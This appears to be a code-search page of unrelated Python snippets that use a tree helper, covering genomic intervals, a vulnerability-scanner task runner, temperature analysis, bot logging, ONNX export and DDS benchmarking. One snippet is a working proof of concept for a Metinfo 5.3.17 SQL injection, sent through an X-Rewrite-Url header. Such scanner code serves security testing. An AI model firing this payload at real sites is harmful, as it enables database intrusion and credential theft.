コード例 #1
0
ファイル: read.py プロジェクト: azofeifa/IE_FIT
def readIntervals(FILE,
                  STRAND,
                  single=False,
                  merge=False,
                  interval=None,
                  pad=(0, 0)):
    FH = open(FILE)
    D = {"+": {}, "-": {}}
    lines = FH.readlines()

    for i, line in enumerate(lines):
        lineArray = line.strip("\n").split("\t")
        assert len(
            lineArray
        ) == 5, "strand\tchrom\tstart\t\stop\tname(ID)\n format please..."
        strand, chrom, start, stop, name = lineArray
        if strand not in D:
            D[strand] = {}
        if chrom not in D[strand]:
            D[strand][chrom] = list()
        D[strand][chrom].append((int(start), int(stop), name))

    #sort
    for strand in D:
        for chrom in D[strand]:
            N = len(D[strand][chrom])
            size = N / 50.
            D[strand][chrom].sort()
            if interval is not None:
                start, stop = size * interval, size * (interval + 1)
                D[strand][chrom] = [
                    d for i, d in enumerate(D[strand][chrom])
                    if start <= i <= stop
                ]
            if single:
                D[strand][chrom] = isolate_overlaps.run(D[strand][chrom])
            elif merge:
                D[strand][chrom] = isolate_overlaps.merge(D[strand][chrom])
            else:
                D[strand][chrom] = D[strand][chrom]
            if STRAND == "-":
                D[strand][chrom] = [(start - pad[1], stop + pad[0], name)
                                    for start, stop, name in D[strand][chrom]]
            else:
                D[strand][chrom] = [(start - pad[0], stop + pad[1], name)
                                    for start, stop, name in D[strand][chrom]]
            D[strand][chrom] = utils.tree(D[strand][chrom])

        if STRAND not in D:
            print "user specified strand is not present in annotation file"
            D = None
    return D
コード例 #2
0
ファイル: RunPoc.py プロジェクト: zodiacyann/osprey
    def start(self):
        task = self.task_queue.get(block=False)
        # [target, (vid1, [name1, class1])]
        target = task[0]
        poc_vid = task[1][0]
        poc_name = task[1][1][0].split(".")[-1]
        poc = task[1][1][1]()

        poc.scan_info = {
            'TaskId': self.task_id,
            'Target': target,
            'Verbose': self.verbose,
            'Error': '',
            'Mode': self.mode,
            'Success': False,
            'Ret': tree(),
            "risk_category": poc.scan_info.get('risk_category', '')
        }
        poc.poc_info["poc"]["Class"] = task[1][1][1].__name__

        timeout = Timeout(self.fb.poc_setting.timeout)
        timeout.start()
        try:
            log.info("{} - {} start...".format(poc_vid, target))
            poc.run(fb=self.fb)
            log.info("{} - {} finish.".format(poc_vid, target))
        except Timeout:
            poc.scan_info['Error'] = "PoC run timeout."
            poc.scan_info['Success'] = False
            log.error("{} - {} error: PoC run timeout.".format(
                poc_vid, target))
        except (requests.exceptions.Timeout,
                requests.exceptions.ConnectionError) as e:
            poc.scan_info['Error'] = str(e)
            poc.scan_info['Success'] = False
            log.error("{} - {} error: {}.".format(poc_vid, target, e))
        except Exception:
            import traceback
            err = traceback.format_exc()
            poc.scan_info['Error'] = err
            poc.scan_info['Success'] = False
            log.error("{} - {} error: {}.".format(poc_vid, target, err))
        finally:
            timeout.cancel()
        if not poc.scan_info.get("Success", False):
            return
        if self.fb.poc_setting.return_resp:
            poc.scan_info["req_resp"] = self._get_http_data(poc_vid, target)
        self.result.put_nowait([poc_name, poc.poc_info, poc.scan_info])
コード例 #3
0
def analysis(project_data_dict):
    suggestion_return = []
    for project_name in project_data_dict.keys():
        payload = {
            "entityId": project_data_dict[project_name]["entityId"],
            "projectName": project_name,
            "dateTime":
            str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        }
        df = pd.read_json(json.dumps(project_data_dict[project_name]["data"]))
        df.set_index('locIds', inplace=True)
        df["tp_average_np"] = df.apply(lambda x: np.array(
            [x.tp_average_7, x.tp_average_1, x.tp_average_2]),
                                       axis=1)
        print(df)
        suggestion_list = []
        room_tree = tree()  # 创建树结构
        for i in list(df.index):
            room_tree[json.loads(i)[0]][json.loads(i)[1]][json.loads(i)[2]]
        room_tree = dicts(room_tree)  # 树结构转换为普通字典结构
        for i in list(df.index):  # 树结构下每个value变成({locId:}, [平均值])的形式,room
            room_tree[json.loads(i)[0]][json.loads(i)[1]][json.loads(
                i)[2]] = df.tp_average_np[i]
            suggestion_list.append(
                {json.loads(i)[2]:
                 judge_room(df.tp_average_np[i][1])})  # 根据前一天的平均温度判断房间是否存在问题
        sum_building = 0
        num = 0
        for k, i in zip(room_tree.keys(), room_tree.values()):  # building
            for j in i.keys():  # floor
                sum_building += np.sum(list(i[j].values()), axis=0)
                num += len(list(i[j].values()))
                i[j] = (i[j], np.average(list(i[j].values()), axis=0))
                suggestion_list.append(
                    {j: judge_floor(i[j][1][1], list(i.keys()))})
            room_tree[k] = (room_tree[k], sum_building / num)
            suggestion_list.append({
                k:
                judge_building(room_tree[k][1][1], list(room_tree.keys()))
            })
        payload["suggestion"] = suggestion_list
        suggestion_return.append(payload)
    return suggestion_return
コード例 #4
0
ファイル: bot.py プロジェクト: usernein/auxiliostatus
async def alert_init(client):
    plugins = [(handler.user_callback
                if hasattr(handler, 'user_callback') else handler.callback)
               for group in client.dispatcher.groups.values()
               for handler in group]

    plugins_count = len(plugins)
    plugins_names = []
    for plugin_callback in plugins:
        members = {
            key: value
            for key, value in inspect.getmembers(plugin_callback)
        }
        full_name = f"{members['__globals__']['__name__']}.{members['__name__']}"
        plugins_names.append(full_name)
    plugins_text = utils.tree(utils.parse_tree(plugins_names))
    started_text = config.langs.start_log(plugins_count=plugins_count,
                                          plugins_names=plugins_names,
                                          plugins_text=plugins_text,
                                          client=client)

    await client.send_message(logs_chat, started_text)
コード例 #5
0
def main():
    image_path, weights_dir = download_demo()

    # Example of weights directory structure
    """
     dir: ./data/unet-lemon-kiwi
     ├── model.pt
     └── config.json
    """
    print(f"Weights dir: {weights_dir}")
    for line in tree(Path(weights_dir)):
        print(line)

    # use one of:
    #device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    #device = torch.device('cuda:0')
    device = torch.device('cpu')

    # load model input resolution and the list of output classes
    model_config_path = os.path.join(weights_dir, "config.json")
    with open(model_config_path) as f:
        model_config = json.load(f)
    num_output_classes = len(model_config["class_title_to_idx"])

    # construct model graph
    model = construct_unet(n_cls=num_output_classes)

    weights_path = os.path.join(weights_dir, "model.pt")
    #load model as DataParallel, can be used only on GPU
    #model = DataParallel(model).cuda()
    #model.load_state_dict(torch.load(weights_path, map_location=device))

    # convert weights from DataParallel to generic format
    generic_weights_path = os.path.join(weights_dir, "generic_model.pt")
    if sly.fs.file_exists(generic_weights_path) is False:
        convert_weights_to_generic_format(model, weights_path,
                                          generic_weights_path)
    # model can be used both on CPU or GPU
    model = construct_unet(n_cls=num_output_classes)
    model.load_state_dict(torch.load(generic_weights_path,
                                     map_location=device))

    # model to device and and set to inference mode
    model.to(device)
    model.eval()

    # inference on image
    image = cv2.imread(image_path, cv2.IMREAD_COLOR)
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
    results, output_model_raw = predict(device, model, model_config, image)
    for class_name, class_mask in results.items():
        cv2.imwrite(os.path.join(data_dir, f"{class_name}.png"), class_mask)

    # convert to ONNX format
    device = torch.device('cpu')
    model.to(device)
    model.eval()
    onnx_weights_path = os.path.join(weights_dir, "model.onnx")
    #sly.fs.silent_remove(onnx_weights_path) # ONLY FOR DEBUG
    if sly.fs.file_exists(onnx_weights_path) is False:
        inp = to_model_input(model_config, image)
        torch.onnx.export(
            model,
            inp,
            onnx_weights_path,
            opset_version=11,
            export_params=True,
            do_constant_folding=True,
            input_names=['input'],
            output_names=['output'],
            dynamic_axes={
                'input': {
                    0: 'batch_size'
                },  # variable lenght axes
                'output': {
                    0: 'batch_size'
                }
            })

        # verify onnx model
        import onnx
        onnx_model = onnx.load(onnx_weights_path)
        onnx.checker.check_model(onnx_model)

        # test onnx model
        import onnxruntime
        ort_session = onnxruntime.InferenceSession(onnx_weights_path)

        def to_numpy(tensor):
            return tensor.detach().cpu().numpy(
            ) if tensor.requires_grad else tensor.cpu().numpy()

        # compute ONNX Runtime output prediction
        x = to_model_input(model_config, image)
        ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(x)}
        ort_outs = ort_session.run(None, ort_inputs)

        # compare ONNX Runtime and PyTorch results
        np.testing.assert_allclose(to_numpy(output_model_raw),
                                   ort_outs[0],
                                   rtol=1e-03,
                                   atol=1e-05)
コード例 #6
0
def _handle_list_files(params):
    root = Path.home().joinpath('Desktop')
    if len(params) > 0 and Path(params[0]).is_dir():
        root = Path(params[0])
    res = f'List of files rooted at {root} :-\n'
    return res + '\n'.join([line for line in utils.tree(root)])
コード例 #7
0
ファイル: BasePoc.py プロジェクト: zodiacyann/osprey
class BasePoc:
    poc_info = {
        'poc': {
            'Id': None,  # poc编号,命名规范为vb_2014_0001_*.py
            'vbid': None,  # vulbox id
            'Name': None,  # poc名称
            'Author': None,  # poc作者
            'Create_date': None,  # poc创建时间:如'2014-11-19'
        },

        # to be edited by you
        'vul': {
            'Product': None,  # 漏洞所在产品名称
            'Version': None,  # 产品的版本号
            'Type': None,  # 漏洞类型
            'Severity': None,  # Bug severity
            'Description': None,  # 漏洞介绍
            'DisclosureDate': None,  # poc公布时间:如'2014-11-19'
        }
    }

    # 用于开始检测前的初始化(target, mode, verbose)
    # 和检测结束后的结果保存(Error,Success,Ret)
    # 额外的输出信息以dict形式保存在Ret中
    # to be updated by verify or exploits
    scan_info = {
        'Target': '',  # 目标网站域名
        'TaskId': '',
        'Mode': 'verify',  # verify或exploit, 默认值为verify
        'Verbose': False,  # 是否打印详细信息,默认值为False
        'Error': '',  # 记录poc失败信息
        'Success': False,  # 是否执行成功,默认值为False表示poc执行不成功,若成功请更新该值为True
        'Ret': utils.tree()  # 记录额外的poc相关信息
    }
    # 用于测试脚本需要数据的存储
    #
    test_case = {
        'Need_fb': False,  # 是否需要上层数据或者测试数据不宜构建, False不进行测试
        'Vuln': [],  # 可通过此PoC进行验证的测试目标
        'Not_vuln': []  # 不能通过此PoC进行验证的测试目标
    }

    def __init__(self):
        pass

    def verify(self, first=False, *args, **kwargs):
        pass

    def exploit(self, first=False, *args, **kwargs):
        pass

    def run(self, first=False, fb=None, **kwargs):
        self.target = self.scan_info['Target']
        self.mode = self.scan_info['Mode']
        self.verbose = self.scan_info['Verbose']
        self.fb = fb

        if self.mode == 'verify':
            self.verify(first=first, **kwargs)
        elif self.mode == 'exploit':
            self.exploit(first=first, **kwargs)

    # call it to test POC
    def run_test(self):
        pass
class MetinfoXRewriteurlSQLInjection(BasePoc):

    # PoC实现类,需继承BasePoc
    # 为PoC填充poc_info、scan_info、test_case三个字典中的基本信息

    poc_info = {
        'poc': {
            'Id': 'vb_2017_0060',    # PoC的VID编号
            'vbid': '',
            'Name': 'Metinfo 5.3.17 X-Rewrite-url SQL Injection',    # PoC名称
            'Author': 'ice.liao',    # PoC作者
            'Create_date': '2017-08-15',    # PoC创建时间
            },

        'vul': {
            'Product': 'Metinfo',    # 漏洞所在产品名称
            'Version': '5.3.17',    # 产品的版本号
            'Type': 'SQL Injection',    # 漏洞类型
            'Severity': 'critical',    # 漏洞危害等级low/medium/high/critical
            'isWeb' : True,    # 是否Web漏洞
            'Description': '''
                MetInfo是中国长沙米拓信息技术有限公司的一套使用PHP和Mysql开发的内容管理系统(CMS)
                危害: 网站数据库信息可造成泄漏,管理员密码可被远程攻击者获得
                修复建议: 前往http://www.metinfo.cn/download/下载最新版本
            ''',    # 漏洞简要描述
            'DisclosureDate': '2017-08-11',    # PoC公布时间
        }
    }

    # scan_info信息可以保持默认,相关参数如target/mode/verbose在TCC框架中都可以通过命令行参数设置
    scan_info = {
        'Target': '',    # 目标网站域名
        'Mode': 'verify',    # verify或exploit
        'Verbose': True,    # 是否打印详细信息
        'Error': '',    # 检测失败时可用于记录相关信息
        'Success': False,    # 是否检出漏洞,若检出请更新该值为True
        'risk_category': 'sec_vul',
        'Ret': tree()    # 可用于记录额外的一些信息
    }

    test_case = {
        'Need_fb': False,
        'Vuln': [],    # 列表格式的测试URL
        'Not_vuln': [],    # 同上
    }


    def verify(self, first=False):
        # 漏洞验证方法(mode=verify)
        target = self.scan_info.get("Target", "")    # 获取测试目标
        verbose = self.scan_info.get("Verbose", False)   # 是否打印详细信息

        # 以下是PoC的检测逻辑
        url = urljoin(target,'index.php?lang=Cn&index=1')
        payload = "1/2/zxxza' union select 1,2,3,md5(0x11),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#/index.php"
        headers = {
            "X-Rewrite-Url": payload
        }

        location = ""
        # 使用req做HTTP请求的发送和响应的处理,req是TCC框架将requests的HTTP请求方法封装成统一的req函数,使用req(url, method, **kwargs),参数传递同requests
        resp = req(url, 'get', headers=headers, allow_redirects=False)
        if resp is not None:
            location = resp.headers.get("Location", "")

        if "47ed733b8d10be225eceba344d533586" in location:
            self.scan_info['Success'] = True    # 漏洞存在,必须将该字段更新为True(必须)
            self.scan_info['Ret']['VerifyInfo']['URL'] = url    # 记录漏洞相关的一些额外信息(可选)
            self.scan_info['Ret']['VerifyInfo']['DATA'] = "X-Rewrite-Url:" + payload
            if verbose:
                highlight('[*] Metinfo 5.3.17 X-Rewrite-url SQL Injection found')    # 打印高亮信息发现漏洞,其他可用方法包括info()/warn()/error()/highlight()方法分别打印不同等级的信息


    def exploit(self, first=False):
        # 漏洞利用方法(mode=verify)
        self.verify(first=first)
コード例 #9
0
def pingpong(o):

    texec = []

    ping = 'ping'
    pong = 'pong'
    if sys.platform == 'win32':
        ping = 'ping.exe'
        pong = 'pong.exe'

    apiselect=0
    if o.capi:
        #C
        texec.append([])
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + ping)
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + pong)
        texec[apiselect].append('C')
        apiselect+=1

    if o.cppapi:
        #SACPP
        texec.append([])
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + ping)
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + pong)
        texec[apiselect].append('SACPP')
        apiselect+=1

    if o.isoapi:
        #ISOCPP
        texec.append([])
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + ping)
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + pong)
        texec[apiselect].append('ISOCPP')
        apiselect+=1


    ''' Create or append to total averages file '''
    tafcsv = utils.getCSV(o.averagesfile)

    #Create nested dictionary
    results = utils.tree()

    for i in texec:
        resultsApi = results[i[2]]
        #1KB
        Bsize = 1000

        try:
            if o.pongonly:
                pong = subprocess.Popen([i[1]],stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                utils.setPriority(pong.pid, o.pongnice, o.pongaffinity)

            if o.pongonly and not o.pingonly:
                #Run for 10 minutes and exit program
                time.sleep(600)
                sys.exit(0)
            time.sleep(1)
            ''' Set the CSV output file (af) '''
            csvfile = i[0] + ".csv"
            cw = utils.getCSV(csvfile)

            cw.writerow([str(time.strftime("%x %H:%M:%S"))])
            try:
                while(Bsize <= (o.maxpayload * 1000)):
                    resultsBsize = resultsApi[int(Bsize)]
                    print "launching " + i[0] + "with args:" + str(Bsize) + " " + str(o.samples) + " " + str(o.seconds)
                    cw.writerow([str(Bsize/1000)+"KB"])
                    cw.writerow(['Seconds'] + ['RT Count'] + ['RT median'] + ['RT min'] +
                                ['W Count'] + ['W median'] + ['W min'] +
                                ['R Count'] + ['R mean'] + ['R min']);
                    try:
                        if o.pingonly:
                            ping = subprocess.Popen( [i[0], str(Bsize), str(o.samples), str(o.seconds) ],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
                            utils.setPriority(ping.pid, o.pingnice, o.pingaffinity)
                    except OSError:
                        print "Cannot find ping executable: " + str([i[0]])

                    #Wait for ping to terminate
                    ping.wait()
                    for line in ping.stderr:
                        print 'err: ' + line

                    for line in ping.stdout:
                        utils.parseRT(line,resultsBsize)

                    for key in sorted(resultsBsize):
                        k = resultsBsize[key]
                        cw.writerow([key] +
                        [k['RoundTrip']['Count']] + [k['RoundTrip']['Median']] + [k['RoundTrip']['Min']] +
                        [k['Read']['Count']] + [k['Read']['Median']] + [k['Read']['Min']] +
                        [k['Write']['Count']] + [k['Write']['Median']] + [k['Write']['Min']])

                    Bsize = Bsize*2
            except OSError:
                print "Cannot find ping executable: " + [i[0]]

            finally:
                if o.pongonly:
                    #Quit pong
                    pingq = subprocess.Popen( [i[0], 'quit' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                    pingq.wait()
                    for line in zip(pingq.stdout, pingq.stderr):
                        print line
                    pong.terminate()

        except OSError:
            print "Cannot find pong executable: " + str([i[1]])



    tafcsv.writerow([str(time.strftime("%x %H:%M:%S"))])
    tafcsv.writerow(['Payload KB'] + ['RoundTrip C'] + ['RoundTrip SACPP'] + ['RoundTip ISOCPP']
                    + ['Read C'] + ['Read SACPP'] + ['Read ISOCPP']
                    + ['Write C'] + ['Write SACPP'] + ['Write ISOCPP'])
    Bsize = 1000
    while Bsize <= (o.maxpayload * 1000):
        KB = Bsize/1000
        #pdb.set_trace()
        tafcsv.writerow([KB] + utils.is_empty(results['C'][Bsize]['Overall']['RoundTrip']['Median'])
                            + utils.is_empty(results['SACPP'][Bsize]['Overall']['RoundTrip']['Median'])
                            + utils.is_empty(results['ISOCPP'][Bsize]['Overall']['RoundTrip']['Median'])
                            + utils.is_empty(results['C'][Bsize]['Overall']['Read']['Median'])
                            + utils.is_empty(results['SACPP'][Bsize]['Overall']['Read']['Median'])
                            + utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Read']['Median'])
                            + utils.is_empty(results['C'][Bsize]['Overall']['Write']['Median'])
                            + utils.is_empty(results['SACPP'][Bsize]['Overall']['Write']['Median'])
                            + utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Write']['Median']))

        Bsize = Bsize*2